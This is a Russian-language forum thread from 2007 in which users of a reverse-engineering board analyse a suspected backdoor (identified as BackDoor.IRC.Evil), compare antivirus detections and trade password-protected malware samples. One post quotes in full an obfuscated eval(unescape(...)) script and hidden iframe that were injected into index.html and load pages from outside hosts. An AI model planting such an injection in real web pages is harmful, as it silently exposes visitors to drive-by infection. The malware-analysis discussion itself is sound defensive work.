Сейчас на форуме: johnniewalker, Kybyx, testrev1337, bedop66938, vsv1 (+7 невидимых) |
eXeL@B —› Крэки, обсуждения —› Исследование вирусов |
<< 1 ... 18 . 19 . 20 . 21 . 22 . 23 . 24 . 25 . 26 . 27 . 28 ... 47 . 48 . >> |
Посл.ответ | Сообщение |
|
Создано: 13 октября 2006 23:15 · Поправил: Модератор · Личное сообщение · #1 |
|
Создано: 20 ноября 2007 18:47 · Поправил: tempread · Личное сообщение · #2 |
|
Создано: 20 ноября 2007 22:44 · Личное сообщение · #3 |
|
Создано: 21 ноября 2007 00:37 · Поправил: ManHunter · Личное сообщение · #4 tempread пишет: улыбнул коментарий внутри: This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. [HEX] пишет: Ну раз такой коммент внутри файла, то на 90% что юзают фриварный продукт по шифрованию скриптов. TrueBug PHP Encoder. Его каммент. Не очень халявный, но снимается действительно за 5 минут. Ломается впрочем тоже. |
|
Создано: 22 ноября 2007 09:03 · Личное сообщение · #5 |
|
Создано: 22 ноября 2007 09:48 · Личное сообщение · #6 Guru_eXe Файл явно подозрительный Несмотря даже внутрености запускать яб не стал такое, так как весит 600 кило, а не одного ресурса в файле нет. Да и вирустотал тоже чето не совсем уж радостно красными цветами сигнализирует www.virustotal.com/resultado.html?6ac8ac29093bacfe7b930d844b7e2829 ----- Computer Security Laboratory |
|
Создано: 22 ноября 2007 10:10 · Личное сообщение · #7 [HEX] пишет: запускать яб не стал такое яб тоже не стал, но за компьютером сиделю любопытные люди... теперь обновляю весь защитный софт, нужно както избавиться от этой заразы, если это вирь конечно. Это не точно, но вроде после запуска этого файла каспер перестал обновляться, пишет, - проверьте подключение, явно чтото нездоровое, поставил каспер поновее, просканил тот файл, каспер промолчал. ----- may all your PUSHes be POPed! |
|
Создано: 22 ноября 2007 10:42 · Личное сообщение · #8 |
|
Создано: 22 ноября 2007 11:22 · Поправил: Guru_eXe · Личное сообщение · #9 [HEX] пишет: В крайнем случае сдампи запущенную прогу и посмотри че там внутри. Каспер пишет, что там армадилло. Под виртуалкой нормально не загрузилось, говорит вырубите отладчик (у меня там драйверстудия установлена, хотя не стартует сама), дампнул, если такк можно сказать.. загнал в вирустотал: Результат: 5/32 (15.63%) www.virustotal.com/ru/resultado.html?9fd2013b9deec9896227934ea10a14e4 AntiVir передумал и Панда перестала считать его подозрительным. Дамп дрвеб идентифицировал как BackDoor.IRC.Evil. а на сам процесс никак не реагирует. add: по всем характеристикам я подхватил вот это: forum.kaspersky.com/lofiversion/index.php/t22161.html у меня также вылазит сообщение о файле ntndis, за одним исключением - там парень пишет, что вирус дабавили в базу, а у меня каспер на этот файл молчит, возможно какято новая модификация, так как архив был стянут с битторрент сети совсем недавно. ----- may all your PUSHes be POPed! |
|
Создано: 22 ноября 2007 12:21 · Личное сообщение · #10 |
|
Создано: 22 ноября 2007 12:26 · Личное сообщение · #11 |
|
Создано: 22 ноября 2007 12:35 · Личное сообщение · #12 |
|
Создано: 22 ноября 2007 12:39 · Поправил: Guru_eXe · Личное сообщение · #13 UsAr, ага, тотже самый ntndis упоминается и в реестре он у меня прописался с такимже путем, только вот операционки у меня на диске C:\ нету =] Самолично я файлы ntndis.exe и ntndis.sys не удалял, мб каспер пошевелился. SLV пишет: Велком ту ботнет надеюсь, что, - прощай навсегда. add: надеюсь, что отсутствие этих файлов является подтверждением того, что вируса нет. ----- may all your PUSHes be POPed! |
|
Создано: 22 ноября 2007 13:05 · Поправил: Styx · Личное сообщение · #14 |
|
Создано: 22 ноября 2007 20:39 · Личное сообщение · #15 |
|
Создано: 23 ноября 2007 11:31 · Поправил: Medsft · Личное сообщение · #16 |
|
Создано: 23 ноября 2007 11:35 · Поправил: Styx · Личное сообщение · #17 WoLFeR Нифига се не засада... Сигнатурный поиск отстой. Насмотрелся я уже на такой "ажур", когда на всякие пакеры понаделают маски... Потом еще у авера базы охренительных размеров и он педалит все, как стоп-кран. Этот троян давно известен, только вот ему жизнь продлили. Не хочу сказать, что в мире есть, что-то идеальное, но к этому, имхо, надо стремиться (: ----- Crack your mind, save the planet |
|
Создано: 23 ноября 2007 12:02 · Личное сообщение · #18 |
|
Создано: 23 ноября 2007 13:05 · Личное сообщение · #19 Тогда вот так эта хрень дописывается к index.html разберешься <iframe src="http://xstuff.biz/tdsko-xyz/out=1194991778" width=1 height=1 frameborder=0><!-- o --><!-- c --><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%2 7%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c %69%66%72%61%6d%65%20%6e%61%6d%65%3d%31%37%64%64%64%34%63%37%34%34%35% 33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%78%2d%76%69%63%74%6f%72%7 9%2e%72%75%2f%66%6f%72%75%6d%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28 %4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%32%30%31%31%30%29%2b%27% 32%62%31%65%31%62%32%32%5c%27%20%77%69%64%74%68%3d%37%35%39%20%68%65%6 9%67%68%74%3d%32%39%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79 %3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script> |
|
Создано: 23 ноября 2007 13:20 · Личное сообщение · #20 |
|
Создано: 23 ноября 2007 13:37 · Личное сообщение · #21 |
|
Создано: 23 ноября 2007 14:37 · Поправил: [HEX] · Личное сообщение · #22 |
|
Создано: 23 ноября 2007 14:50 · Поправил: Styx · Личное сообщение · #23 |
|
Создано: 23 ноября 2007 16:00 · Поправил: [HEX] · Личное сообщение · #24 |
|
Создано: 23 ноября 2007 16:16 · Личное сообщение · #25 Styx пишет: Нифига се не засада... Сигнатурный поиск отстой. Насмотрелся я уже на такой "ажур", когда на всякие пакеры понаделают маски... Потом еще у авера базы охренительных размеров и он педалит все, как стоп-кран. Этот троян давно известен, только вот ему жизнь продлили. Не хочу сказать, что в мире есть, что-то идеальное, но к этому, имхо, надо стремиться (: Ну и иди доказывай свое мнение про сигнатурный поиск в разные конторы. Я не говорю что сигнатурный поиск рулед, я говрю как работают конторы, и для них никакого гемора для детекта этого троя не будет ни на минуту. Т.к. они одну копию распростроняют, и внесли одну сингнатуру и вся сеть легла. Вот терь и думай нах напрягатся больше. А твое мнение по поводу "ацтой, неацтой" никого не _бед. |
|
Создано: 23 ноября 2007 16:48 · Поправил: Styx · Личное сообщение · #26 [HEX] Там с заголовком скорее всего что-то. Пытался запускать (: Винда грит что-то это не прожка, может она 64-х битная. WoLFeR Я по конторам ходить не стану, мне это не интересно. Я просто хотел сказать, что более менее сложные упаковщики - проблема для антивирусов (как программ). Антивирус в большинстве своем прожка на которой зарабатывают деньги. ----- Crack your mind, save the planet |
|
Создано: 23 ноября 2007 16:51 · Личное сообщение · #27 |
|
Создано: 23 ноября 2007 17:05 · Личное сообщение · #28 попробуйте еще вот это внутри почти тоже самое только на 100 байт длинее и пришло под расширением .php пароль на архив vir 3449_23.11.2007_CRACKLAB.rU.tgz - VIR.RAR |
|
Создано: 23 ноября 2007 17:30 · Личное сообщение · #29 |
|
Создано: 23 ноября 2007 17:49 · Поправил: [HEX] · Личное сообщение · #30 |
|
Создано: 23 ноября 2007 18:05 · Поправил: Styx · Личное сообщение · #31 Medsft Вот исправленый ехе, скорее всего он не докачался: 9098_23.11.2007_CRACKLAB.rU.tgz - vir.rar мда, опоздал (: второй vir.exe как раз имеет размер тот что надо ----- Crack your mind, save the planet |
<< 1 ... 18 . 19 . 20 . 21 . 22 . 23 . 24 . 25 . 26 . 27 . 28 ... 47 . 48 . >> |
eXeL@B —› Крэки, обсуждения —› Исследование вирусов |
Эта тема закрыта. Ответы больше не принимаются. |